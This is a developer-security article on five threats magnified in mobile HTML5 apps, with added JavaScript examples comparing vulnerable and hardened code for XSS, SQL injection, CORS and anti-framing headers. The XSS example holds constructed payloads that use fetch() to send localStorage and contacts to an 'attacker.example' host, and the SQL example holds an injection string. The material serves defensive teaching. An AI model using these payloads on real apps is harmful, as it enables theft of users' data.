By now, developers have grown accustomed to dealing with certain “traditional” threats to Web applications. Injection flaws and cross-site scripting, for instance, have been on the OWASP Top 10 list for years. But take those same Web applications and convert them into a mobile HTML5 application, and suddenly older, “lower-impact” threats carry significantly more risk on the mobile platform.



It’s important for developers to remember that any vulnerability that affects Web applications can also affect mobile HTML5 applications. And because a mobile app has access to far more than a page in a browser does, including local storage on the device, contacts, location and other sensitive information, these threats are magnified in a mobile environment.



Adding to the problem, many developers use multi-platform development and deployment tools that can themselves introduce vulnerabilities into the application. And many Web app specialists are now being asked to build mobile apps without a proper understanding of the security implications.



Here are five traditional threats that are magnified in a mobile HTML5 environment:



1. Local Storage: With traditional Web apps, local storage is mostly a moot point (cookies aside), so the risk is minimal. In a mobile app, local storage is central to the user experience, and that heavier use raises the impact of any weakness in how the stored data is protected.



All too often, mobile HTML5 apps leave sensitive user data scattered across the device’s storage, where another app, a device backup, or anyone with access to a rooted or jailbroken device can read it. This may include sensitive data in plaintext files, data that is only weakly protected (such as unsalted password hashes), or data that is encrypted but stored alongside its encryption key, which is no better than plaintext. Developers must assume that anything written to on-device storage will be read and manipulated by other applications and by malicious actors. Tip for Developers: Do not store sensitive user data on the device; hold it in memory for the session and fetch it again when it is needed.



2. Cross-Origin Resource Sharing: CORS is the mechanism by which a server relaxes the browser’s same-origin policy and declares which other origins may read its responses. The broader risk of mixing internal and external libraries and resources is well known for Web apps, but it is often overlooked in mobile HTML5 apps. In fact, these apps are frequently shipped with a wildcard access policy that lets the app load from or call any origin, and lets any origin use its resources. That puts the app at a much higher risk of running a malicious external script, particularly if it is also hit by a cross-site scripting attack.

While Web apps face the same risk, a mobile app exposes a much larger attack surface through its richer device features, so the potential damage is greater. Tip for Developers: Limit dependence on untrusted code sources and libraries. Where that can’t be avoided, the application (or the server making the request on its behalf) should only be allowed to reach an explicit whitelist of origins, never a wildcard, and the app’s own CORS responses should only echo origins on that list.

3. Cross-Site Scripting: An XSS attack on a traditional Web app can steal the user’s session or attack the browser. In a mobile HTML5 app the injected script runs with the app’s device privileges, so it can also reach the services the app has been granted (contacts, pictures, location, or whatever else the application has permission to use) and send their contents off the device. Tip for Developers: Treat all user-supplied data as hostile and untrusted. Validate input on the way in, and apply output encoding appropriate to the context (HTML body, attribute, URL or script) before any user data is displayed on screen. The encoding step is what actually stops the attack; filtering on its own is easy to bypass.

4. SQL Injection: SQL injection is another common Web threat that has been routinely documented by the OWASP Top 10. In a mobile HTML5 application, in addition to attacks against a remote server’s database, you also have to worry about the queries the app itself runs against its on-device database (Web SQL or a SQLite plugin) using data it received from a server response, a URL, or another application. Tip for Developers: Protect the local database the same way as the remote one: use parameterized queries for every value, check anything that cannot be parameterized (such as a column name) against a fixed list, and avoid storing sensitive user data in the local database at all.

5. Cross-Frame Scripting: Usually grouped with “clickjacking,” CFS occurs when an attacker’s page loads the application inside a frame, typically invisible and stacked over or under the attacker’s own content, so that the user’s taps land on the real application’s controls while they believe they are interacting with something else. In mobile HTML5 applications the impact is often severe, because the framed app can be driven through any action its device permissions allow. Tip for Developers: Have the application server tell the browser that the app’s pages may only be rendered at the top level, never inside another page’s frame. This is done with the X-Frame-Options response header (DENY, or SAMEORIGIN if the app frames its own pages); the Content-Security-Policy frame-ancestors directive is its newer equivalent, and the two are best sent together.
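As an added example for the XSS item, not code from the article: context-aware output encoding in JavaScript for a comment list rendered inside a mobile HTML5 app, with the vulnerable string-concatenation version beside the hardened one. The comment object and both hostnames are constructed; the navigator.contacts.find call in the payload is the one the Cordova contacts plugin exposed, and appears only to illustrate what an injected script can reach once it runs inside the app.

```javascript
// Added example, not code from the article. The comment object and both
// hostnames are constructed; navigator.contacts.find in the payload is the
// call the Cordova contacts plugin exposed, shown only to illustrate what an
// injected script can reach once it runs inside the app.

// Encode for the HTML body and attribute contexts. The forward slash is
// included so a closing tag can't be assembled from a bare '/'.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// URL context: only http(s) may go into an href. A javascript: or data: link
// would execute with the app's device privileges the moment it is tapped.
// The base URL is an assumption, used only to resolve relative links.
function safeHref(url, base = 'https://app.example.invalid/') {
  try {
    const u = new URL(String(url), base);
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '#';
  } catch (e) {
    return '#';
  }
}

// Vulnerable: untrusted fields are concatenated straight into markup.
function renderCommentUnsafe(c) {
  return `<li><a href="${c.url}">${c.author}</a>: ${c.body}</li>`;
}

// Hardened: each field is encoded for the context it lands in.
function renderCommentSafe(c) {
  return `<li><a href="${escapeHtml(safeHref(c.url))}">` +
    `${escapeHtml(c.author)}</a>: ${escapeHtml(c.body)}</li>`;
}

// Constructed hostile input: the link tries to post localStorage to the
// attacker; the body tries to read the address book through the device API.
const hostileComment = {
  author: 'mallory',
  url: 'javascript:fetch("https://attacker.example/?d="' +
       '+encodeURIComponent(JSON.stringify(localStorage)))',
  body: '<img src=x onerror="navigator.contacts.find([\'*\'],' +
        'c=>fetch(\'https://attacker.example/?c=\'+JSON.stringify(c)))">',
};
```

Passing `hostileComment` through `renderCommentUnsafe` produces markup that both runs the onerror handler and carries a javascript: link; `renderCommentSafe` turns the tag into visible text and replaces the link with an inert `#`. Note that the same data needs different treatment if it is later placed inside a script block or an inline event handler, which is why the encoding is chosen per context rather than applied once at input time.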
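As an added example for the SQL injection item, not code from the article: the same lookup against an on-device database written first with string concatenation and then with bound parameters, plus the case parameters cannot cover. `tx` is a Web SQL (or cordova-sqlite-storage) transaction, whose executeSql(sql, params, onSuccess, onError) signature is the real one; the notes table, the recording stand-in for the transaction and the inputs are constructed for illustration.

```javascript
// Added example, not code from the article. `tx` is a Web SQL (or
// cordova-sqlite-storage) transaction; executeSql(sql, params, onSuccess,
// onError) is its real signature. The notes table and the inputs below are
// constructed for illustration.

// Vulnerable: untrusted input is spliced into the SQL text, so an owner value
// such as  x' OR '1'='1  returns every row in the on-device database.
function findNotesUnsafe(tx, owner) {
  const sql = "SELECT id, body FROM notes WHERE owner = '" + owner + "'";
  tx.executeSql(sql, []);
  return sql;
}

// Hardened: the value travels as a bound parameter and can never change the
// shape of the statement.
function findNotesSafe(tx, owner) {
  const sql = 'SELECT id, body FROM notes WHERE owner = ?';
  tx.executeSql(sql, [owner]);
  return sql;
}

// Parameters cannot stand in for identifiers, so anything that ends up as a
// column or table name must be checked against a fixed list instead.
const SORTABLE_COLUMNS = new Set(['id', 'created_at']);
function findNotesSorted(tx, owner, sortColumn) {
  if (!SORTABLE_COLUMNS.has(sortColumn)) {
    throw new Error('unsupported sort column: ' + sortColumn);
  }
  const sql = `SELECT id, body FROM notes WHERE owner = ? ORDER BY ${sortColumn}`;
  tx.executeSql(sql, [owner]);
  return sql;
}

// Constructed stand-in for a transaction that records what it is asked to run,
// so the two approaches can be compared without opening a database.
function recordingTx() {
  const calls = [];
  return { calls, executeSql(sql, params) { calls.push({ sql, params }); } };
}

const hostileOwner = "x' OR '1'='1";
```

With a real transaction the unsafe query returns every note on the device, while the safe query looks for an owner literally named `x' OR '1'='1` and finds nothing. The sort-column check is the part most often forgotten: a value that lands in ORDER BY, a table name, or a LIMIT clause is not a value SQLite will bind, so it has to be constrained some other way.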
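As an added example serving both the CORS item and the cross-frame scripting item, not code from the article: the two server-side settings those tips come down to, written as pure functions over the request’s Origin header so they can be checked without starting a server. The allowed origins and the request handler are assumptions for illustration.

```javascript
// Added example, not code from the article. The allowed origins are
// assumptions; a real deployment would load them from configuration.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://api.example.com',
]);

// Weak: reflect whatever Origin the request carried, or fall back to '*'.
// Any page on the web can then call the API cross-origin and read the reply.
function weakCorsHeaders(requestOrigin) {
  return { 'Access-Control-Allow-Origin': requestOrigin || '*' };
}

// Hardened: normalise the Origin header, echo it only if it is on the
// whitelist, otherwise send no CORS header at all so the browser blocks the
// cross-origin read. Comparing full origins (scheme + host + port) defeats
// look-alikes such as https://app.example.com.attacker.example.
function corsHeadersFor(requestOrigin) {
  let origin;
  try {
    origin = new URL(requestOrigin).origin;
  } catch (e) {
    return {}; // missing, "null" or malformed Origin: treat as not allowed
  }
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Vary': 'Origin', // keep caches from serving one origin's answer to another
  };
}

// Anti-framing: X-Frame-Options DENY tells the browser never to render this
// response inside a frame; frame-ancestors is the CSP equivalent, sent too.
function antiFramingHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

function securityHeaders(requestOrigin) {
  return { ...corsHeadersFor(requestOrigin), ...antiFramingHeaders() };
}

// Hypothetical request handler for Node's http module, showing where the
// headers are applied; creating and listening on the server is left to the caller.
function handle(req, res) {
  for (const [name, value] of Object.entries(securityHeaders(req.headers.origin))) {
    res.setHeader(name, value);
  }
  res.end('ok');
}
```

One caveat worth checking in your own deployment: a WebView that loads the app from a local file often sends `Origin: null`, and it is tempting to add `null` to the list so the app works. Do not; any sandboxed iframe or file-origin page can present the same value, so allowing it is equivalent to the wildcard. Serve the app from a real origin, or have it talk to the API through a native plugin, instead.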
Geoffrey Vaughan is an IT security consultant at Security Compass, an information security firm specializing in Web and mobile application security.

Guest Views are contributions by SD Times readers.